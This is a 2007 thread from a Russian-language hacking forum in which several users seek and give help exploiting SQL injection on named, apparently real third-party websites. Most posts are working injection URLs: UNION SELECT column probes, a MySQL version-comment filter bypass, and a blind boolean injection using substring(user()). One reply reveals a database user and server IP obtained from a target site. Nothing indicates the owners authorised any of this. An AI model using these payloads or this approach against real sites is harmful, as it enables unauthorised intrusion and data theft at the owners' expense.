ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 23.10.2007, 14:50
EST a1ien
Участник форума
Регистрация: 02.04.2006
Сообщений: 273
Провел на форуме:
1269624

Репутация: 114
Отправить сообщение для EST a1ien с помощью ICQ
По умолчанию

Народ благо не создавать новых тем помогите со скулем
http://www.lesprom.ru/html/error.php3?e404'/*
Немогу подобрать колонки может стото не так делаю( может просто mysql версии < 4.0

вот такой запрос непрокатывает( надоело поля подбирать да и неверю что их так много)
Цитата:
http://www.lesprom.ru/html/error.php3?-1'%20union%20select%20null,null,null,null,null,nul l,null,null,null,null,null,null,null,null,null,nul l,null,null,null,null,null,null,null,null,null,nul l,null,null,null,null,null,null,null,null,null,nul l,null,null,null,null,null,null,null,null,null,nul l,null,null,null,null,null,null,null,null,null,nul l,null,null,null,null,null,null,null/*
А вот тут
http://www.lesprom.ru/members/azlist.php3?sort=clist&order=fullname/*
с ордером проблема помогите хотябы поля подобрать.

Последний раз редактировалось EST a1ien; 23.10.2007 в 14:53..
 
Ответить с цитированием

  #12  
Старый 23.10.2007, 20:03
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

Цитата:
Сообщение от EST a1ien  
http://www.lesprom.ru/html/error.php3?e404'/*
Немогу подобрать колонки может стото не так делаю( может просто mysql версии < 4.0

мускул действительно 3x в нем union select не катит
да и пробелы фильтруются

Код:
http://www.lesprom.ru/html/error.php3?e404'/*!30000asas/*

Цитата:
Сообщение от EST a1ien  
А вот тут
http://www.lesprom.ru/members/azlist.php3?sort=clist&order=fullname/*
с ордером проблема помогите хотябы поля подобрать.

тут у меня не получилось провести инъекцию, хотя ошибка выдается, мож там фильтрация какая нить...

а насчет:
Цитата:
с ордером проблема помогите хотябы поля подобрать.
я вобще не понял о чем ты
__________________
Карфаген должен быть разрушен...

Последний раз редактировалось Scipio; 23.10.2007 в 20:09..
 
Ответить с цитированием

  #13  
Старый 23.10.2007, 20:15
rubik-nerubik
Участник форума
Регистрация: 04.05.2007
Сообщений: 267
Провел на форуме:
409147

Репутация: 33
По умолчанию

http://www.cddj.ru/index.php?productID=-6915+union+select+1,2,3,4/*
вот сайт, я давал кешу и блекберу, они развели руками или чем там )
кстати, кеш автор множества статей по скулю =\
 
Ответить с цитированием

  #14  
Старый 23.10.2007, 22:02
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

вобщем там mysql 4.1 user()-clubfotonet@81.177.16.192

Это все делается через подзапросы, но в другом параметре:
Код:
http://www.cddj.ru/index.php?productID=1312&picture_id=1420%20and%20substring(user(),25,1)=2/*
вобщем если выражение верное, то загружаются сразу много картинок, в противном случае картинки незагружаются...
версия 4.1 используй подзапросы
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #15  
Старый 23.10.2007, 22:34
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357

Репутация: 3742


Отправить сообщение для blackybr с помощью ICQ Отправить сообщение для blackybr с помощью AIM Отправить сообщение для blackybr с помощью Yahoo
По умолчанию

Цитата:
Сообщение от rubik-nerubik  
http://www.cddj.ru/index.php?productID=-6915+union+select+1,2,3,4/*
вот сайт, я давал кешу и блекберу, они развели руками или чем там )
кстати, кеш автор множества статей по скулю =\
в этом параметре да =)
на полный аудит сайта я не не подписывался =)
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
 
Ответить с цитированием

  #16  
Старый 24.10.2007, 11:55
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию

Цитата:
http://www.cddj.ru/index.php?productID=-6915+union+select+1,2,3,4/*
вот сайт, я давал кешу и блекберу, они развели руками или чем там )
кстати, кеш автор множества статей по скулю =\
Когда вас корректно посылают вы не понимаете?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ